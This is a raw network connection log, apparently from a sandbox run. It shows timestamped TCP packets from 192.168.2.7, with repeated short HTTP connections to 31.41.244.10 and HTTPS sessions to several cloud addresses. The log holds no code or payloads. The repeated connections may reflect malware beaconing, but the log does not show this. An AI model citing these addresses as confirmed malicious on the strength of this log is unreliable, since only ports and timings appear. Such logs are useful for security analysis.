Sep 6, 2024 10:01:09.489959955 CEST	51417	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.494992971 CEST	80	51417	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:09.773597002 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:09.773713112 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:09.778713942 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:09.778736115 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:10.196605921 CEST	80	51417	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:10.200733900 CEST	51417	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.321532011 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.321532011 CEST	51417	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.326451063 CEST	80	51418	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:10.326567888 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.326666117 CEST	80	51417	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:10.326713085 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.326858044 CEST	51417	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:10.331475973 CEST	80	51418	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.019939899 CEST	80	51418	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.020004988 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.023031950 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.023344994 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.028093100 CEST	80	51418	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.028175116 CEST	80	51419	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.028178930 CEST	51418	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.028250933 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.028448105 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.033272982 CEST	80	51419	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.735997915 CEST	80	51419	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.738821983 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.843031883 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.843522072 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.848258972 CEST	80	51419	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.848325014 CEST	80	51420	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:11.848571062 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.848572969 CEST	51419	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.848795891 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:11.853504896 CEST	80	51420	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:12.543752909 CEST	80	51420	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:12.543849945 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.546689034 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.547023058 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.551831961 CEST	80	51420	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:12.551843882 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:12.551903963 CEST	51420	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.551934958 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.552243948 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:12.556989908 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.262650013 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.262821913 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.369842052 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.370131969 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.375262022 CEST	80	51422	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.375365019 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.375549078 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.375617027 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.375998974 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.611917019 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.612085104 CEST	51421	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:13.612155914 CEST	80	51422	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:13.616935968 CEST	80	51421	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:14.318795919 CEST	80	51422	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:14.318953037 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.322051048 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.322442055 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.327197075 CEST	80	51422	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:14.327261925 CEST	80	51423	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:14.327307940 CEST	51422	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.327383995 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.327719927 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:14.332508087 CEST	80	51423	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.028039932 CEST	80	51423	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.028156996 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.141401052 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.141716957 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.146506071 CEST	80	51424	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.146622896 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.146689892 CEST	80	51423	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.146768093 CEST	51423	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.146910906 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.151690006 CEST	80	51424	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.844136000 CEST	80	51424	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.844679117 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.847599030 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.847879887 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.852653980 CEST	80	51425	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.852751970 CEST	80	51424	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:15.852854013 CEST	51424	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.852868080 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.853156090 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:15.858344078 CEST	80	51425	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:16.580396891 CEST	80	51425	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:16.582066059 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.688308001 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.688621044 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.693341017 CEST	80	51425	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:16.693425894 CEST	51425	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.693428040 CEST	80	51426	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:16.693521023 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.693798065 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:16.698538065 CEST	80	51426	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:16.978157043 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:16.978203058 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:16.978343964 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:16.978563070 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:16.978578091 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.383409023 CEST	80	51426	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:17.383475065 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.386370897 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.386735916 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.391504049 CEST	80	51428	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:17.391580105 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.391644001 CEST	80	51426	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:17.391820908 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.391879082 CEST	51426	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:17.396605015 CEST	80	51428	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:17.438604116 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.439196110 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:17.439219952 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.439539909 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.441364050 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:17.441365004 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:17.441443920 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.592374086 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:17.592505932 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:17.595696926 CEST	51427	443	192.168.2.7	23.219.161.132
Sep 6, 2024 10:01:17.595715046 CEST	443	51427	23.219.161.132	192.168.2.7
Sep 6, 2024 10:01:18.119920969 CEST	80	51428	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.120215893 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.224283934 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.224287987 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.229154110 CEST	80	51429	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.229394913 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.229420900 CEST	80	51428	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.229520082 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.229535103 CEST	51428	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.234273911 CEST	80	51429	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.935170889 CEST	80	51429	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.935262918 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.938088894 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.938498020 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.943034887 CEST	80	51429	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.943111897 CEST	51429	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.943293095 CEST	80	51430	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:18.943376064 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.943651915 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:18.948381901 CEST	80	51430	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:19.652538061 CEST	80	51430	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:19.652667046 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.761739969 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.762027979 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.766789913 CEST	80	51432	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:19.766901970 CEST	80	51430	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:19.766957045 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.767064095 CEST	51430	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.767083883 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:19.771836996 CEST	80	51432	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:19.779244900 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:19.779334068 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:19.784024954 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:19.784043074 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:19.863049984 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:19.863089085 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:19.863156080 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:19.863368034 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:19.863378048 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.462428093 CEST	80	51432	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:20.462536097 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.465419054 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.465713978 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.470576048 CEST	80	51432	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:20.470588923 CEST	80	51434	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:20.470783949 CEST	51432	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.470832109 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.470972061 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:20.475698948 CEST	80	51434	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:20.715740919 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.716145992 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:20.716162920 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.716461897 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.716912985 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:20.716985941 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.717062950 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:20.764497995 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:20.949434996 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.949491024 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.949573040 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.949609995 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.949698925 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.949707985 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.949810982 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.949816942 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.949919939 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.949927092 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.950047970 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950081110 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.950551987 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950566053 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950581074 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950586081 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950586081 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950587034 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950767994 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950788021 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.950902939 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950917006 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.950987101 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.950999975 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.951064110 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.951071978 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.951143980 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.951152086 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:20.951230049 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:20.951240063 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.189898968 CEST	80	51434	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:21.190047979 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.299918890 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.300199032 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.305233955 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:21.305310011 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.305310965 CEST	80	51434	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:21.305447102 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.305505037 CEST	51434	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:21.310230970 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:21.413265944 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.413424015 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.413831949 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.413945913 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.413983107 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.414192915 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.414927006 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.416816950 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.417680025 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.417680025 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.417697906 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.417736053 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.417942047 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.420372009 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.420378923 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.420608044 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.423006058 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.423016071 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.423233032 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.425513983 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.425530910 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.425733089 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.426222086 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.428174019 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.428184986 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.428215027 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.428442955 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.431391954 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.431396008 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.431610107 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.435405016 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.435549974 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.435756922 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.436152935 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.436152935 CEST	51438	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.436168909 CEST	443	51438	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.436317921 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.436917067 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.436917067 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.436932087 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.437072992 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.437096119 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.437099934 CEST	443	51436	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.437653065 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.437654018 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.437681913 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.437681913 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.438999891 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.439001083 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.439008951 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.439034939 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.439187050 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.439214945 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.439245939 CEST	443	51437	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.439279079 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.439285040 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.440643072 CEST	51436	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.440681934 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.440681934 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.440737963 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.441071987 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.441076994 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.441086054 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.441091061 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.441881895 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.441883087 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.441894054 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.442048073 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.442078114 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.442084074 CEST	443	51435	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.443885088 CEST	51437	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.443943977 CEST	51435	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.446661949 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:21.451689005 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:21.541481972 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:21.546698093 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:21.551578999 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:21.640508890 CEST	443	51439	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.640707970 CEST	51439	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.641510010 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:21.648504019 CEST	443	51440	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.648631096 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.648649931 CEST	51440	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.648653030 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.648701906 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.648804903 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.648817062 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.648857117 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.648885965 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.677941084 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:21.728620052 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.728641033 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.728688002 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.728732109 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.728745937 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.728782892 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.728817940 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.778594971 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:21.809565067 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.809586048 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.809689999 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.809704065 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.809772968 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.810477972 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.810496092 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.810607910 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.810616970 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.810657024 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.814424038 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.814438105 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.814585924 CEST	51433	443	192.168.2.7	13.107.246.40
